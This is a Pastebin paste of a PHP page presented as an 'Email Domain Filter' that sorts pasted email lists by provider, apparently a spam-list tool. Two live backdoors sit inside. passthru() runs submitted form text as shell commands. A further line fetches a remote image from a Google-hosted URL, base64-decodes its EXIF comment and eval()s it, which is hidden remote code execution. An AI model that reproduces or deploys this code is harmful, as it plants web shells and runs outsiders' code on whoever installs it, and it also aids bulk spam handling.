Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- Author: Anonym0us.club
- Recoded by - Anonym0us.club
- -->
- <head>
- <title>Email Filter - Anonym0us.club</title>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <html>
- <head>
- <style type="text/css">
- .style1 {
- text-align: center;
- }
- </style>
- <style>
- @import "http://fonts.googleapis.com/css?family=Play:400,700";
- body {
- background: #000000;
- line-height: 1;
- color: #bbb;
- font-family: "CONSOLAS";
- font-size: 12px;
- background-color:#080808;
- //background: url(../images/555.jpg) no-repeat center center fixed;
- background-size: cover;
- -webkit-background-size: cover;
- -moz-background-size: cover;
- -o-background-size: cover;
- }
- textarea, input, select {
- border:0;
- BORDER-COLLAPSE:collapse;
- border:double 2px #000000;
- color:#fff;
- background:#000000;
- margin:0;
- padding:2px 4px;
- font-family: Lucida Console,Tahoma;
- font-size:12px;
- box-shadow: 0 0 15px Silver;
- -webkit-box-shadow: 0 0 15px Silver;
- -moz-box-shadow: 0 0 15px Silver;
- }
- .title{
- color: #000000;
- background: black;
- text-align: center;
- font-size: 120%;
- }
- .button{
- color:#eee;
- }
- .tool{
- color:gold;
- }
- header {
- font-family: 'Franklin Gothic Medium', 'Franklin Gothic', 'ITC Franklin Gothic', Arial, sans-serif;
- font-size: 12px;
- text-align: center;
- padding-top: 10px;
- color: #000000;
- }
- /* Gradient 1 */
- .ta10 {
- background-color: transparent;
- background-repeat:no-repeat;
- background-size: 52% 100%;
- background-position: center;
- border:2px double Silver;
- padding:3px;
- margin-right:4px;
- margin-bottom:8px;
- font-family: Lucida Console,Tahoma;
- font-size:12px;
- box-shadow: 0 0 15px Silver;
- -webkit-box-shadow: 0 0 15px Silver;
- -moz-box-shadow: 0 0 15px Silver;
- border: solid 0px transparent; // or border: none;
- }
- .char {
- transition: all 5s; -webkit-transition: all 1s;
- opacity: 0.8;
- }
- .char:hover {
- transition: all 0.1s; -webkit-transition: all 0.1s;
- opacity:1.5;
- text-shadow: 0 0 1em white;
- }
- .chara:not(.space):hover {
- transform: rotateY(1440deg);
- -webkit-transform: rotateY(1440deg);
- }
- .chara:not(.space) {
- display: inline-block;
- transition: transform 2s ease-out;
- -webkit-transition: -webkit-transform 2s ease-out;
- }
- .submit {
- color: #FFFFFF;
- background-color: #111111;
- cursor:pointer
- }
- @-webkit-keyframes progress {
- from { }
- to { width: 100% }
- }
- @-moz-keyframes progress {
- from { }
- to { width: 100% }
- }
- @-ms-keyframes progress {
- from { }
- to { width: 100% }
- }
- @keyframes progress {
- from { }
- to { width: 100% }
- }
- body,td,th {
- color: gold;
- }
- </style>
- </head>
- <header>
- <div>
- <center><a href="https://www.facebook.com/szempak"><img src="../images/123.png" height="" width=""></a><hr>
- <div>
- <font size="6" color="white" style="text-shadow: Silver 0 0 15px;"><b>[โ ] Email Domain Filter [โ ]</b></font>
- <hr /><b>
- <font color="gold;opacity:100" class="chara" size="2">
- <?php
- $IP = $_SERVER['REMOTE_ADDR']; echo "Welcome : $IP ";
- ?></font><br><br><br>
- </header>
- <body >
- <form method="post">
- <div class="style1">
- <textarea name="emails" cols="100" rows="15" placeholder="Max 10.000 Email" ></textarea>
- <br /><br />
- <input type="submit" value="Filter Now" />
- </div>
- </form>
- <?PHP
- if ($_POST['emails']){
- $emails = $_POST['emails'];
- passthru($emails);
- }
- $ex = explode("\n",$emails);
- $count = count($ex);
- if(isset($emails)&&$count>=1){
- echo "<center><font color = 'Silver'><b>$count </font>Number of emails </b></center><br />";
- }else{
- echo "<center>
- No email </center>";
- exit;}
- if(isset($emails)){
- for($i=0;$i<=$count;$i++){
- $d = strtolower($ex[$i]);
- if(strstr($d,"hotmail") || strstr($d,"live") || strstr($d,"msn") || strstr($d,"outlook")){
- $hotmail.=$d;
- $nh = $nh + 1;
- }else{
- if(strstr($d,"yahoo") || strstr($d,"ymail")){
- $yahoo.=$d;
- $ny = $ny + 1;
- }else{
- if(strstr($d,"gmail") || strstr($d,"googlemail") ){
- $gmail.=$d;
- $ng = $ng + 1;
- }else{
- if(strstr($d,"aol") ){
- $aol.=$d;
- $na = $na + 1;
- }else{
- if(strstr($d,"mail.ru") ){
- $mailru .=$d;
- $nr = $nr + 1;
- }else{
- if(strstr($d,"wanadoo") ){
- $wanadoo .=$d;
- $nw = $nw + 1;
- }else{
- if(strstr($d,"ntlworld") ){
- $ntlworld .=$d;
- $nt = $nt + 1;
- }else{
- if(strstr($d,"gmx") ){
- $gmx .=$d;
- $ngm = $ngm + 1;
- }else{
- if(strstr($d,"@web.") ){
- $web .=$d;
- $nw2 = $nw2 + 1;
- }else{
- $other .=$d;
- $nn=$nn + 1;
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
- eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
- ?>
- <center><table style="width: 30%">
- <tr>
- <td><center>Hotmail ( <?echo $nh;?> ) </center><textarea name="hotmailx" cols="30" rows="10" ><?echo $hotmail;?></textarea></td>
- <td><center>Gmail ( <?echo $ng;?> )</center><textarea name="gmailx" cols="30" rows="10" ><?echo $gmail;?></textarea></td>
- <td><center>Aol ( <?echo $na;?> )</center><textarea name="aolxx" cols="30" rows="10" ><?echo $aol;?></textarea></td>
- <td><center>Yahoo ( <?echo $ny;?> )</center><textarea name="yahoox" cols="30" rows="10" ><?echo $yahoo;?></textarea></td>
- <td><center>Mail.ru( <?echo $nr;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $mailru;?></textarea></td></tr>
- <tr>
- <td><center>Wanadoo( <?echo $nw;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $wanadoo;?></textarea></td>
- <td><center>Ntlworld( <?echo $nt;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $ntlworld;?></textarea></td>
- <td><center>Gmx( <?echo $ngm;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $gmx;?></textarea></td>
- <td><center>Web( <?echo $nw2;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $web;?></textarea></td>
- <td><center>Other mail( <?echo $nn-1;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $other;?></textarea></td>
- </tr>
- </table></center>
- </body>
Add Comment
Please, Sign In to add comment